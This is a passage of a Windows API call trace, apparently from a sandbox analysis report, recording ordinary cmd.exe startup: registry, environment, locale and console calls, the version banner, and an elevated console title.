(_Func=0x7ff6b42b8020) returned 0x7ff6b42b8020 [0057.876] GetCurrentThreadId () returned 0xf64 [0057.876] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf64) returned 0x70 [0057.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0057.877] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetThreadUILanguage") returned 0x7ff92fdea990 [0057.877] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.793] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.793] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x62afcffd48 | out: phkResult=0x62afcffd48*=0x0) returned 0x2 [0058.793] VirtualQuery (in: lpAddress=0x62afcffd34, lpBuffer=0x62afcffcb0, dwLength=0x30 | out: lpBuffer=0x62afcffcb0*(BaseAddress=0x62afcff000, AllocationBase=0x62afc00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.793] VirtualQuery (in: lpAddress=0x62afc00000, lpBuffer=0x62afcffcb0, dwLength=0x30 | out: lpBuffer=0x62afcffcb0*(BaseAddress=0x62afc00000, AllocationBase=0x62afc00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.793] VirtualQuery (in: lpAddress=0x62afc01000, lpBuffer=0x62afcffcb0, dwLength=0x30 | out: lpBuffer=0x62afcffcb0*(BaseAddress=0x62afc01000, AllocationBase=0x62afc00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.793] VirtualQuery (in: lpAddress=0x62afc04000, lpBuffer=0x62afcffcb0, dwLength=0x30 | out: lpBuffer=0x62afcffcb0*(BaseAddress=0x62afc04000, AllocationBase=0x62afc00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.793] VirtualQuery (in: lpAddress=0x62afd00000, lpBuffer=0x62afcffcb0, dwLength=0x30 | out: lpBuffer=0x62afcffcb0*(BaseAddress=0x62afd00000, AllocationBase=0x62afd00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.793] GetConsoleOutputCP () returned 0x1b5 [0060.201] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6b42dfbb0 | out: lpCPInfo=0x7ff6b42dfbb0) returned 1 [0060.201] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6b42c8150, Add=1) returned 1 [0060.201] _get_osfhandle (_FileHandle=1) returned 0x254 [0060.201] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6b42dfc04 | out: lpMode=0x7ff6b42dfc04) returned 0 [0060.202] _get_osfhandle (_FileHandle=0) returned 0x248 [0060.202] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6b42dfc00 | out: lpMode=0x7ff6b42dfc00) returned 0 [0060.202] _get_osfhandle (_FileHandle=1) returned 0x254 [0060.202] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0060.202] _get_osfhandle (_FileHandle=1) returned 0x254 [0060.202] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6b42dfc08 | out: lpMode=0x7ff6b42dfc08) returned 0 [0060.202] _get_osfhandle (_FileHandle=0) returned 0x248 [0060.202] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6b42dfc0c | out: lpMode=0x7ff6b42dfc0c) returned 0 [0060.202] GetEnvironmentStringsW () returned 0x18f03d95a10* [0060.202] GetProcessHeap () returned 0x18f03d90000 [0060.202] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xa7c) returned 0x18f03d964a0 [0060.202] FreeEnvironmentStringsA (penv="A") returned 1 [0060.202] GetProcessHeap () returned 0x18f03d90000 [0060.202] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x8) returned 0x18f03d96f30 [0060.202] GetEnvironmentStringsW () returned 0x18f03d95a10* [0060.202] GetProcessHeap () returned 0x18f03d90000 [0060.202] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xa7c) returned 0x18f03d96f50 [0060.202] FreeEnvironmentStringsA (penv="A") returned 1 [0060.203] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x62afcfebf8 | out: phkResult=0x62afcfebf8*=0x7c) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x4, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x1, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x1, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x0, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x40, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x40, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x40, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegCloseKey (hKey=0x7c) returned 0x0 [0060.203] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x62afcfebf8 | out: phkResult=0x62afcfebf8*=0x7c) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x40, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x1, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x1, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x0, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x9, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x4, lpData=0x62afcfec10*=0x9, lpcbData=0x62afcfebf4*=0x4) returned 0x0 [0060.203] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x62afcfebf0, lpData=0x62afcfec10, lpcbData=0x62afcfebf4*=0x1000 | out: lpType=0x62afcfebf0*=0x0, lpData=0x62afcfec10*=0x9, lpcbData=0x62afcfebf4*=0x1000) returned 0x2 [0060.203] RegCloseKey (hKey=0x7c) returned 0x0 [0060.203] time (in: timer=0x0 | out: timer=0x0) returned 0x5ccf5d1a [0060.204] srand (_Seed=0x5ccf5d1a) [0060.204] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0060.204] malloc (_Size=0x4000) returned 0x18f040454f0 [0060.204] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0060.204] malloc (_Size=0xffce) returned 0x18f03e90080 [0060.204] ??_V@YAXPEAX@Z () returned 0x18f03e90080 [0060.205] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x18f03e90080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0060.205] malloc (_Size=0xffce) returned 0x18f03ea0060 [0060.205] ??_V@YAXPEAX@Z () returned 0x18f03ea0060 [0060.205] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f03ea0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0060.205] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0060.205] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.205] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.206] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.206] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.206] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.206] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.206] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.206] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.206] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.206] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.206] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.206] GetProcessHeap () returned 0x18f03d90000 [0060.206] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d964a0) returned 1 [0060.206] GetEnvironmentStringsW () returned 0x18f03d95a10* [0060.206] GetProcessHeap () returned 0x18f03d90000 [0060.206] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xa94) returned 0x18f03d97a10 [0060.206] FreeEnvironmentStringsA (penv="A") returned 1 [0060.206] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0060.206] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.206] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.206] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.206] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.206] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.206] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.206] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.206] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.206] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.206] malloc (_Size=0xffce) returned 0x18f03eb0040 [0060.207] ??_V@YAXPEAX@Z () returned 0x18f03eb0040 [0060.207] GetProcessHeap () returned 0x18f03d90000 [0060.207] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x40) returned 0x18f03d984b0 [0060.207] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x18f03eb0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0060.207] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x18f03eb0040, lpFilePart=0x62afcff770 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x62afcff770*="Desktop") returned 0x17 [0060.207] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0060.208] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x62afcff4a0 | out: lpFindFileData=0x62afcff4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x18f03d98500 [0060.208] FindClose (in: hFindFile=0x18f03d98500 | out: hFindFile=0x18f03d98500) returned 1 [0060.208] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x62afcff4a0 | out: lpFindFileData=0x62afcff4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x18f03d98500 [0060.208] FindClose (in: hFindFile=0x18f03d98500 | out: hFindFile=0x18f03d98500) returned 1 [0060.208] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x62afcff4a0 | out: lpFindFileData=0x62afcff4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe97a6edd, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe97a6edd, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x18f03d98500 [0060.208] FindClose (in: hFindFile=0x18f03d98500 | out: hFindFile=0x18f03d98500) returned 1 [0060.209] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0060.209] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0060.209] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0060.209] GetProcessHeap () returned 0x18f03d90000 [0060.209] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d97a10) returned 1 [0060.209] GetEnvironmentStringsW () returned 0x18f03d90fc0* [0060.209] GetProcessHeap () returned 0x18f03d90000 [0060.209] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xacc) returned 0x18f03d98500 [0060.209] FreeEnvironmentStringsA (penv="=") returned 1 [0060.209] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x18f03e90080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0060.209] GetProcessHeap () returned 0x18f03d90000 [0060.209] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d984b0) returned 1 [0060.209] ??_V@YAXPEAX@Z () returned 0x1 [0060.209] ??_V@YAXPEAX@Z () returned 0x1 [0060.209] GetProcessHeap () returned 0x18f03d90000 [0060.209] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x4016) returned 0x18f03d98fe0 [0060.210] GetProcessHeap () returned 0x18f03d90000 [0060.210] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d98fe0) returned 1 [0060.210] GetConsoleOutputCP () returned 0x1b5 [0061.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6b42dfbb0 | out: lpCPInfo=0x7ff6b42dfbb0) returned 1 [0061.204] GetUserDefaultLCID () returned 0x409 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6b42dbb78, cchData=8 | out: lpLCData=":") returned 2 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x62afcffb30, cchData=128 | out: lpLCData="0") returned 2 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x62afcffb30, cchData=128 | out: lpLCData="0") returned 2 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x62afcffb30, cchData=128 | out: lpLCData="1") returned 2 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6b42dbb68, cchData=8 | out: lpLCData="/") returned 2 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6b42dbb00, cchData=32 | out: lpLCData="Mon") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6b42dbac0, cchData=32 | out: lpLCData="Tue") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6b42dba80, cchData=32 | out: lpLCData="Wed") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6b42dba40, cchData=32 | out: lpLCData="Thu") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6b42dba00, cchData=32 | out: lpLCData="Fri") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6b42db9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6b42db980, cchData=32 | out: lpLCData="Sun") returned 4 [0061.204] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6b42dbb58, cchData=8 | out: lpLCData=".") returned 2 [0061.205] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6b42dbb40, cchData=8 | out: lpLCData=",") returned 2 [0061.205] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0061.206] GetProcessHeap () returned 0x18f03d90000 [0061.206] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x0, Size=0x20c) returned 0x18f03d96560 [0061.206] GetConsoleTitleW (in: lpConsoleTitle=0x18f03d96560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0062.405] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.405] GetFileType (hFile=0x254) returned 0x3 [0062.408] ApiSetQueryApiSetPresence () returned 0x0 [0062.408] ResolveDelayLoadedAPI () returned 0x7ff91284d990 [0062.932] BrandingFormatString () returned 0x18f03d91850 [0062.951] GetVersion () returned 0x3ad7000a [0062.951] _vsnwprintf (in: _Buffer=0x62afcffc90, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x62afcffc28 | out: _Buffer="10.0.15063") returned 10 [0062.951] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.951] GetFileType (hFile=0x254) returned 0x3 [0062.951] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6b42e7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0062.951] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6b42e7f60, nSize=0x2000, Arguments=0x62afcffc30 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0062.951] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0062.952] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x62afcffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcffb88*=0x26, lpOverlapped=0x0) returned 1 [0062.952] _vsnwprintf (in: _Buffer=0x7ff6b42e7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x62afcffc58 | out: _Buffer="\r\n") returned 2 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] GetFileType (hFile=0x254) returned 0x3 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0062.952] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x62afcffc28, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcffc28*=0x2, lpOverlapped=0x0) returned 1 [0062.952] _vsnwprintf (in: _Buffer=0x7ff6b42e7f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x62afcffc58 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] GetFileType (hFile=0x254) returned 0x3 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0062.952] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x62afcffc28, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcffc28*=0x34, lpOverlapped=0x0) returned 1 [0062.952] _vsnwprintf (in: _Buffer=0x7ff6b42e7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x62afcffc58 | out: _Buffer="\r\n") returned 2 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] GetFileType (hFile=0x254) returned 0x3 [0062.952] _get_osfhandle (_FileHandle=1) returned 0x254 [0062.952] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0062.952] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x62afcffc28, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcffc28*=0x2, lpOverlapped=0x0) returned 1 [0062.952] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0062.952] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="CopyFileExW") returned 0x7ff92fdee830 [0062.952] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="IsDebuggerPresent") returned 0x7ff92fdee300 [0062.952] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff92f1b0a40 [0062.953] ??_V@YAXPEAX@Z () returned 0x1 [0062.953] _get_osfhandle (_FileHandle=0) returned 0x248 [0062.953] GetFileType (hFile=0x248) returned 0x3 [0062.953] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0062.953] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x62afcffa98 | out: TokenHandle=0x62afcffa98*=0x0) returned 0xc000007c [0062.953] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x62afcffa98 | out: TokenHandle=0x62afcffa98*=0x94) returned 0x0 [0062.953] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x62afcffa48, TokenInformationLength=0x4, ReturnLength=0x62afcffa50 | out: TokenInformation=0x62afcffa48, ReturnLength=0x62afcffa50) returned 0x0 [0062.953] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x62afcffa50, TokenInformationLength=0x4, ReturnLength=0x62afcffa48 | out: TokenInformation=0x62afcffa50, ReturnLength=0x62afcffa48) returned 0x0 [0062.953] NtClose (Handle=0x94) returned 0x0 [0062.953] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x62afcffa60, nSize=0x0, Arguments=0x62afcffa68 | out: lpBuffer="\x8320\x3d9\x18f") returned 0xf [0062.953] GetProcessHeap () returned 0x18f03d90000 [0062.953] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x218) returned 0x18f03d96c30 [0062.996] GetConsoleTitleW (in: lpConsoleTitle=0x62afcffab0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0063.867] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0063.867] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0065.513] GetProcessHeap () returned 0x18f03d90000 [0065.513] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d96c30) returned 1 [0065.513] LocalFree (hMem=0x18f03d98320) returned 0x0 